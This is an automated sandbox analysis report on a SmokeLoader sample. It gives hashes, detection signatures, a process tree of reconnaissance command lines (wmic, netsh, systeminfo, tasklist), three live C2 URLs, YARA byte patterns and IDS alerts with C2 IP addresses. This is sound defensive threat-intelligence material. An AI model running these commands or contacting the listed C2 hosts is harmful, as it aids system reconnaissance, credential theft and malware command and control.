Edit tour

Windows Analysis Report
9VgIkx4su0.exe

Overview

General Information

Sample name:	9VgIkx4su0.exe renamed because original name is a hash value
Original sample name:	5d99d66ef42ec43af05b9304aebefdb6.exe
Analysis ID:	1525244
MD5:	5d99d66ef42ec43af05b9304aebefdb6
SHA1:	b90f71e96df4a0d654aaab1fdfe2845c8dcb8032
SHA256:	4942ff94e613e09ebaada37b5d61a9b08459fcef987303c8dce1fd10868825ac
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Found evasive API chain (may stop execution after checking mutex)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the windows firewall

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ipconfig to lookup or modify the Windows network settings

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to detect virtual machines (SLDT)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

9VgIkx4su0.exe (PID: 5556 cmdline: "C:\Users\user\Desktop\9VgIkx4su0.exe" MD5: 5D99D66EF42EC43AF05B9304AEBEFDB6)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

3E40.exe (PID: 5572 cmdline: C:\Users\user\AppData\Local\Temp\3E40.exe MD5: 119C907F0839351B214BD51034B6F124)

FDDB.exe (PID: 3720 cmdline: C:\Users\user\AppData\Local\Temp\FDDB.exe MD5: 69C7186C5393D5E94294E39DA1D4D830)

cmd.exe (PID: 3624 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 2164 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 3552 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 5236 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 4456 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 6572 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 6844 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 5444 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 6100 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 1852 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 2792 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 1476 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 3396 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 7072 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 5572 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

ipconfig.exe (PID: 932 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)

ROUTE.EXE (PID: 6492 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)

netsh.exe (PID: 5776 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

systeminfo.exe (PID: 2652 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

tasklist.exe (PID: 7144 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

explorer.exe (PID: 6580 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 6824 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 2180 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 4444 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 3944 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 1976 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

eihchav (PID: 7060 cmdline: C:\Users\user\AppData\Roaming\eihchav MD5: 5D99D66EF42EC43AF05B9304AEBEFDB6)

dghchav (PID: 4284 cmdline: C:\Users\user\AppData\Roaming\dghchav MD5: 119C907F0839351B214BD51034B6F124)

msiexec.exe (PID: 1480 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

dghchav (PID: 4036 cmdline: C:\Users\user\AppData\Roaming\dghchav MD5: 119C907F0839351B214BD51034B6F124)

eihchav (PID: 6300 cmdline: C:\Users\user\AppData\Roaming\eihchav MD5: 5D99D66EF42EC43AF05B9304AEBEFDB6)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000003.2684210393.0000000000600000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2340049741.0000000002090000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x126d8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000004.00000002.2339931516.00000000005CD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12a10:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12a69:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000007.00000003.2931576265.00000000005F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.2735166251.0000000000560000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000007.00000002.2982835885.00000000005E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000007.00000002.2983174460.000000000075D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12419:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Process Memory Space: explorer.exe PID: 2180	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: explorer.exe PID: 4444	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.3E40.exe.560e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.2.dghchav.5e0e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.3.dghchav.5f0000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
6.2.3E40.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
6.3.3E40.exe.600000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.2.dghchav.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 5572, StartAddress: C76632B0, TargetImage: C:\Users\user\AppData\Local\Temp\3E40.exe, TargetProcessId: 5572

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\eihchav, CommandLine: C:\Users\user\AppData\Roaming\eihchav, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\eihchav, NewProcessName: C:\Users\user\AppData\Roaming\eihchav, OriginalFileName: C:\Users\user\AppData\Roaming\eihchav, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\eihchav, ProcessId: 7060, ProcessName: eihchav

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3624, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 1476, ProcessName: WMIC.exe

Sigma detected: Suspicious Network Command

Source: Process started

Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3624, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 6492, ProcessName: ROUTE.EXE

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T23:27:26.351046+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49755	190.224.203.37	80	TCP
2024-10-03T23:27:27.758377+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49765	190.224.203.37	80	TCP
2024-10-03T23:27:29.194284+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49776	190.224.203.37	80	TCP
2024-10-03T23:27:30.544106+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49787	190.224.203.37	80	TCP
2024-10-03T23:27:31.904800+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49798	190.224.203.37	80	TCP
2024-10-03T23:27:33.286503+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49807	190.224.203.37	80	TCP
2024-10-03T23:27:34.676196+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49815	190.224.203.37	80	TCP
2024-10-03T23:27:36.198420+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49826	190.224.203.37	80	TCP
2024-10-03T23:27:37.768833+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49836	190.224.203.37	80	TCP
2024-10-03T23:27:39.169274+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49847	190.224.203.37	80	TCP
2024-10-03T23:27:40.555439+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49857	190.224.203.37	80	TCP
2024-10-03T23:27:42.030471+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49866	190.224.203.37	80	TCP
2024-10-03T23:27:43.407680+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49875	190.224.203.37	80	TCP
2024-10-03T23:27:44.841740+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49886	190.224.203.37	80	TCP
2024-10-03T23:27:46.506715+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49896	190.224.203.37	80	TCP
2024-10-03T23:27:47.946560+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49905	190.224.203.37	80	TCP
2024-10-03T23:27:49.341855+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49915	190.224.203.37	80	TCP
2024-10-03T23:27:50.755886+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49925	190.224.203.37	80	TCP
2024-10-03T23:27:52.931239+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49933	190.224.203.37	80	TCP
2024-10-03T23:27:54.628396+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49943	190.224.203.37	80	TCP
2024-10-03T23:27:56.024081+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49955	190.224.203.37	80	TCP
2024-10-03T23:27:57.416962+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49962	190.224.203.37	80	TCP
2024-10-03T23:27:58.838657+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49973	190.224.203.37	80	TCP
2024-10-03T23:28:00.557599+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49983	190.224.203.37	80	TCP
2024-10-03T23:28:01.964076+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49995	190.224.203.37	80	TCP
2024-10-03T23:28:04.724708+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50001	190.224.203.37	80	TCP
2024-10-03T23:28:06.106668+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50002	190.224.203.37	80	TCP
2024-10-03T23:28:07.783475+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50003	190.224.203.37	80	TCP
2024-10-03T23:28:27.492822+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50004	23.145.40.162	443	TCP
2024-10-03T23:28:28.827338+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50005	23.145.40.162	443	TCP
2024-10-03T23:28:29.698649+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50006	23.145.40.162	443	TCP
2024-10-03T23:28:30.593972+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50007	23.145.40.162	443	TCP
2024-10-03T23:28:31.491717+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50008	23.145.40.162	443	TCP
2024-10-03T23:28:32.397820+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50009	23.145.40.162	443	TCP
2024-10-03T23:28:33.281763+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50010	23.145.40.162	443	TCP
2024-10-03T23:28:34.158137+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50011	23.145.40.162	443	TCP
2024-10-03T23:28:35.523365+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50012	23.145.40.162	443	TCP
2024-10-03T23:28:36.427500+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50013	23.145.40.162	443	TCP
2024-10-03T23:28:37.346496+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50014	23.145.40.162	443	TCP
2024-10-03T23:28:38.252554+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50015	23.145.40.162	443	TCP
2024-10-03T23:28:39.245617+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50016	23.145.40.162	443	TCP
2024-10-03T23:28:40.510134+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50017	23.145.40.162	443	TCP
2024-10-03T23:28:41.706436+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50018	23.145.40.162	443	TCP
2024-10-03T23:28:42.669103+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50019	23.145.40.162	443	TCP
2024-10-03T23:28:43.577729+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50020	23.145.40.162	443	TCP
2024-10-03T23:28:49.975552+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50021	23.145.40.162	443	TCP
2024-10-03T23:29:17.365927+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50022	190.224.203.37	80	TCP
2024-10-03T23:29:23.862679+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50023	190.224.203.37	80	TCP
2024-10-03T23:29:32.216730+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50024	190.224.203.37	80	TCP
2024-10-03T23:29:43.489724+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50025	190.224.203.37	80	TCP
2024-10-03T23:29:54.425367+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50026	190.224.203.37	80	TCP
2024-10-03T23:30:05.329427+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50027	23.145.40.162	443	TCP
2024-10-03T23:30:12.051514+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50028	187.131.253.169	80	TCP
2024-10-03T23:30:24.977476+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50029	23.145.40.162	443	TCP
2024-10-03T23:30:33.007547+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50030	187.131.253.169	80	TCP
2024-10-03T23:30:36.790275+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50031	23.145.40.162	443	TCP
2024-10-03T23:30:45.768674+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50032	187.131.253.169	80	TCP
2024-10-03T23:30:55.983251+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50033	23.145.40.162	443	TCP

ETPRO MALWARE Dridex Post Checkin Activity 3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T23:28:27.815568+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50004	23.145.40.162	443	TCP
2024-10-03T23:28:29.109018+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50005	23.145.40.162	443	TCP
2024-10-03T23:28:29.972457+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50006	23.145.40.162	443	TCP
2024-10-03T23:28:30.878819+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50007	23.145.40.162	443	TCP
2024-10-03T23:28:31.769891+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50008	23.145.40.162	443	TCP
2024-10-03T23:28:32.676674+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50009	23.145.40.162	443	TCP
2024-10-03T23:28:33.562551+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50010	23.145.40.162	443	TCP
2024-10-03T23:28:34.427119+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50011	23.145.40.162	443	TCP
2024-10-03T23:28:35.807317+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50012	23.145.40.162	443	TCP
2024-10-03T23:28:36.718130+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50013	23.145.40.162	443	TCP
2024-10-03T23:28:37.626997+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50014	23.145.40.162	443	TCP
2024-10-03T23:28:38.530680+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50015	23.145.40.162	443	TCP
2024-10-03T23:28:39.534129+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50016	23.145.40.162	443	TCP
2024-10-03T23:28:40.782266+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50017	23.145.40.162	443	TCP
